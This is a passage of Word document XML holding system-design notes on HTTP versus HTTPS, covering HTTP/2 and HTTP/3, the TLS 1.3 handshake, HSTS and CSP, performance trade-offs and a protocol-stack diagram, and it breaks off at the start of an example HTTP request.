    <w:p w14:paraId="3FD09C56" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  HTTP/2   → binary framing + stream multiplexing (no app-layer HOL blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410A7811" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">             HPACK header compression, flow control, server push (failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD026F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">             TCP-level HOL blocking remains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D434980" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  HTTP/3   → QUIC transport (UDP-based, no TCP HOL blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69675990" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">             0-RTT resumption, connection migration, better mobile performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE3CDA4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="0A54EEBD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTPS = HTTP + TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77577A2F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  TLS provides: Confidentiality + Integrity + Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F75FBF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  TLS does NOT provide: Anonymity, metadata hiding (IP visible, SNI visible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A211A33" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="22F6DB17" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS 1.3 Handshake (1 RTT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733FBC8C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  ClientHello (supported ciphers, ECDHE public key, SNI) →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3133BA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                ← ServerHello + Certificate + CertificateVerify + Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9A63ED" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Finished + First HTTP request →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F85097" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="6F38945C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Security Properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A06FA7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Perfect Forward Secrecy: ECDHE ephemeral keys → past sessions safe if key compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE8389A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Certificate validation: chain to trusted root + expiry + revocation + CT logs + hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D04B1C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  HSTS: prevent SSL stripping → convert all HTTP to HTTPS before sending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DE18A9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  CSP: prevent XSS → restrict script sources, require nonces for inline scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5064DAAB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="4825BE2B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Performance Reality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD4E9C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  TLS 1.3 + AES-NI: &lt;1% CPU overhead at scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BDB275" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  HTTP/2 over HTTPS: faster than HTTP/1.1 for multi-resource pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1273E8AE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  0-RTT resumption: eliminates TLS latency for repeat connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B21B34" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  HTTP/3 + QUIC: 0-RTT new connection + connection migration for mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA5203" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="06B918CE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The Fundamental Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F956E7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Security     ↔  Performance (TLS handshake RTTs, encryption CPU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49879B02" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Caching      ↔  Freshness (max-age, stale-while-revalidate, immutable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72527351" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  HTTP methods ↔  Idempotency (design APIs to be safely retryable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601ED13A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  0-RTT        ↔  Replay safety (0-RTT enables replay attacks — only for GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194D8001" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  CSP strictness ↔  Developer ergonomics (strict CSP breaks legacy inline scripts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D346959" w14:textId="77777777" w:rsidR="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP and HTTPS are not just request-response protocols — they are a complete framework for distributed application communication</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>, embodying decades of learned lessons about performance (multiplexing, compression, caching), security (TLS, CSP, HSTS, certificate transparency), and reliability (conditional requests, retry semantics, status code precision). Every version of HTTP represents a fundamental rethinking of the transport assumptions — HTTP/1.1 assumed persistent TCP was sufficient, HTTP/2 revealed that application-layer multiplexing was necessary, HTTP/3 revealed that TCP itself was the bottleneck. The evolution continues: the core problem of </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how to reliably, securely, and efficiently transfer structured data between distributed systems</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> is never fully solved — each solution reveals the next constraint to push against.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C873CBE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP vs HTTPS in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B321545" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What HTTP and HTTPS Fundamentally Are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B66E683" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP (HyperText Transfer Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> is an application-layer protocol for transmitting hypermedia documents (and any data) between clients and servers. It operates in plaintext — every byte sent is readable by anyone on the network path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5FF64" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS (HTTP Secure)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> is HTTP layered on top of TLS (Transport Layer Security). The same HTTP protocol runs unchanged, but an encryption layer beneath it ensures confidentiality, integrity, and authentication of all data in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4363F6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705EBCE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP stack:          HTTPS stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D815FA6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>┌──────────┐         ┌──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F6800" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>│   HTTP   │         │   HTTP   │  ← Same protocol, identical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0685BC38" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53925941" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>│   TCP    │         │   TLS    │  ← Encryption layer (the difference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3076F332" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CA42C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>│   IP     │         │   TCP    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2313121D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">└──────────┘         </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAAAC1E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                     │   IP     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799BC9D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                     └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE591FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The deeper truth:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> HTTPS is not a separate protocol — it's HTTP transported over a TLS-secured channel. The "S" doesn't change what HTTP does; it changes how the bytes travel. Every HTTP feature (methods, headers, status codes, cookies, caching) works identically. The difference is entirely in the transport security layer beneath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151DED7A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters for system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C2A00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data in transit</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> is the primary attack vector HTTPS addresses. Without it, passwords, tokens, personal data, and API payloads are visible to every network device between client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1154232F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS is no longer optional.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Browsers mark HTTP as "Not Secure." Search engines penalize HTTP sites. Modern browser APIs (geolocation, camera, service workers, HTTP/2) require HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D68C1A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance implications</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> have been largely eliminated. TLS 1.3 adds only 1 RTT (or 0 with 0-RTT resumption). The "HTTPS is slow" myth is outdated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C9ACF8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate management</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> becomes an operational burden — provisioning, renewal, revocation, key storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD72AC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="2AE300B8">
          <v:rect id="_x0000_i3975" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3524FC63" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. HTTP in Depth — How It Works on the Wire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F33BE0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 The HTTP Request/Response Cycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4CFF62" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A complete HTTP request on the wire (plaintext):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE0182" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCA6D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>GET /api/users/123 HTTP/1.1\r\n</w:t>
      </w:r>
    </w:p>
